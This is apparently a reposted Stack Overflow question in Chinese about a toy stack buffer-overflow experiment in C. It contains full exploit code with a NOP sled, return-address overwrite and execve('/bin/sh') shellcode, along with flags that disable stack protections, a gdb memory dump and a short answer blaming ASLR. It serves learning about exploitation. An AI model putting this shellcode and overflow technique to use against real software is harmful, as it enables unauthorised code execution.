gpt4 book ai didi

c - 运行 shellcode 可在调试器中运行,但不能单独运行

转载 作者:行者123 更新时间:2023-11-30 19:32:08 26 4
gpt4 key购买 nike

我正在尝试缓冲区溢出。我编写了一个玩具示例,它执行以下操作:

  • 构建一个由三部分组成的缓冲区:

1) 具有多个“恶意”返回地址的 block ,这些返回地址会覆盖堆栈上的真实返回地址;

2) NOP sled block 恶意返回地址所指向的;

3) 已知正在运行的实际 shellcode

  • 将此缓冲区写入堆栈上太小的缓冲区中。

有趣的是:当在shell中运行时,程序会产生段错误。但是:使用调试器 gdb 运行相同的程序可以按预期工作。可能是什么原因?

代码:

// gcc -g -m32 -z execstack -fno-stack-protector -o target_prog_dbg target_prog_dbg.c

#include <stdio.h>
#include <string.h>
#include <stdint.h>

typedef uint32_t INT;

INT nop_sled_size = 64;
INT jmp_addr_size = 16;

INT* base_addr = 0xffffd024;

char shellcode[] = "\xeb\x02\xeb\15\xe8\xf9\xff\xff\xff/bin/sh\x90\x90\x90\x90\x90\x90\x90\x90\x90\x5b\x31\xc0\x88\x43\x07\x89\x43\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80";

void make_exploit(char* exploit) {

int i;

for (i = 0; i < jmp_addr_size; i++)
((INT*)exploit)[i] = base_addr + nop_sled_size/2;

memset(((INT*)exploit)+jmp_addr_size, 0x90, nop_sled_size*sizeof(INT));

strcpy(exploit+sizeof(INT)*(jmp_addr_size + nop_sled_size), shellcode);

}


void run_exploit() {

char buffer[16];

int exploit_size = (nop_sled_size+jmp_addr_size)*sizeof(INT)+strlen(shellcode);

char* exploit = (char*)malloc(exploit_size);

make_exploit(exploit);

memcpy(buffer, exploit, exploit_size);



}

int main () {

run_exploit();

return 0;

}

编译:

gcc -g -m32 -z execstack -fno-stack-protector -o target_prog_dbg target_prog_dbg.c

缓冲区:

(gdb) x/x $ebp
0xffffd028: 0xffffd0a4

(gdb) x/100x buffer
0xffffd008: 0xffffd0a4 0xffffd0a4 0xffffd0a4 0xffffd0a4
0xffffd018: 0xffffd0a4 0xffffd0a4 0xffffd0a4 0xffffd0a4
0xffffd028: 0xffffd0a4 0xffffd0a4 0xffffd0a4 0xffffd0a4
0xffffd038: 0xffffd0a4 0xffffd0a4 0xffffd0a4 0xffffd0a4
0xffffd048: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd058: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd068: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd078: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd088: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd098: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd0a8: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd0b8: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd0c8: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd0d8: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd0e8: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd0f8: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd108: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd118: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd128: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd138: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd148: 0x0deb02eb 0xfffff9e8 0x69622fff 0x68732f6e
0xffffd158: 0x90909090 0x90909090 0xc0315b90 0x89074388
0xffffd168: 0x43890843 0x8d0bb00c 0x538d084b 0xff80cd0c

请注意,操作系统是 64 位系统。

最佳答案

ASLR 造成了这种影响。在 gdb 中,无论出于何种原因,似乎都没有涉及 ASLR。

关于c - 运行 shellcode 可在调试器中运行,但不能单独运行,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/47419396/

26 4 0
Copyright 2021 - 2024 cfsdn All Rights Reserved 蜀ICP备2022000587号
广告合作:1813099741@qq.com 6ren.com